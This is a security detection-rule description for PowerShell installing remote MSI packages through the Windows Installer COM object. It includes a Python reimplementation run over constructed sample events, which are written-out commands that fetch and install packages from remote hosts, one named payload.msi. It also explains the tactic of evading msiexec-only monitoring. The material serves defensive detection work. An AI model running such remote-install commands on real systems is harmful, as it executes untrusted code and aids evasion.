
Summary
This detection rule identifies PowerShell commands that install MSI packages through the Windows Installer COM object (`WindowsInstaller.Installer`) when the package is fetched from a remote location. Installing through the COM object instead of `msiexec.exe` is a tactic that can evade detections which only monitor `msiexec` command lines, and it can indicate deployment of unauthorized software or lateral movement within a network. The rule matches on command-line arguments characteristic of such installations and filters out local installations by excluding command lines whose only location references point to localhost. A command line that references both the COM object and a remote location, and is not limited to localhost, qualifies as potentially malicious. Because the rule relies on the full process command line, it requires process-creation telemetry that records command lines (for example Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled).
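The following is an added example, not the rule's own query, that reimplements the matching logic described above in Python and runs it over a few constructed process-creation events. The page does not list the exact remote-location markers or localhost filters the rule uses, so the `http(s)://` and UNC-path markers, the `localhost`/`127.0.0.1` exclusion list, and the sample command lines below are assumptions chosen to illustrate the three conditions: COM object present, a remote location present, and the remote references not being solely localhost.

```python
import re

# ProgID of the Windows Installer COM object; PowerShell is case-insensitive.
COM_OBJECT_RE = re.compile(r"WindowsInstaller\.Installer", re.IGNORECASE)

# Assumed remote-location markers: http(s) URLs and UNC paths.
# Group 1 captures a URL host (optionally with a port), group 2 a UNC host.
REMOTE_RE = re.compile(r"(?:https?://([^/\s\"']+)|\\\\([^\\\s\"']+))", re.IGNORECASE)

# Assumed localhost filter list (IPv6 literals such as [::1] are not handled here).
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


def remote_hosts(cmdline):
    """Return every host referenced by a URL or UNC path in the command line."""
    hosts = []
    for m in REMOTE_RE.finditer(cmdline):
        host = m.group(1) or m.group(2)
        hosts.append(host.split(":")[0].lower())  # drop an optional port
    return hosts


def matches_rule(cmdline):
    """True when the COM object is referenced and at least one location is not localhost."""
    if not COM_OBJECT_RE.search(cmdline):
        return False
    non_local = [h for h in remote_hosts(cmdline) if h not in LOCAL_HOSTS]
    return bool(non_local)


# Constructed sample events (process-creation records reduced to the fields the rule needs).
SAMPLE_EVENTS = [
    {   # COM object + remote HTTP package: should match
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '$i = New-Object -ComObject WindowsInstaller.Installer; '
                       '$i.InstallProduct("http://203.0.113.10/setup.msi", "ACTION=INSTALL")',
    },
    {   # COM object created via ProgID reflection + UNC package path: should match
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'$t=[Type]::GetTypeFromProgID("windowsinstaller.installer");'
                       r'$i=[Activator]::CreateInstance($t);'
                       r'$i.InstallProduct("\\fileserver\share\tool.msi","")',
    },
    {   # COM object, but the only location is localhost: filtered out
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '$i = New-Object -ComObject WindowsInstaller.Installer; '
                       '$i.InstallProduct("http://localhost:8080/app.msi", "")',
    },
    {   # localhost and a remote host both referenced (not solely localhost): should match
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '$i = New-Object -ComObject WindowsInstaller.Installer; '
                       '$i.InstallProduct("http://127.0.0.1/stage.msi", ""); '
                       '$i.InstallProduct("https://198.51.100.7/payload.msi", "")',
    },
    {   # Classic msiexec from a remote URL: no COM object, out of scope for this rule
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": "msiexec.exe /i http://203.0.113.10/setup.msi /qn",
    },
]


def run_rule(events):
    """Return the command lines of the events the rule would flag."""
    return [e["CommandLine"] for e in events if matches_rule(e["CommandLine"])]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print("MATCH:", hit)
```

The localhost handling is the part worth getting right when porting this to a real query language: the rule must suppress command lines where every location is local, not command lines that merely mention localhost somewhere, otherwise the fourth sample above would be missed.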
Categories
- Windows
- Endpoint
- Network
Data Sources
- Process
- Command
Created: 2025-06-05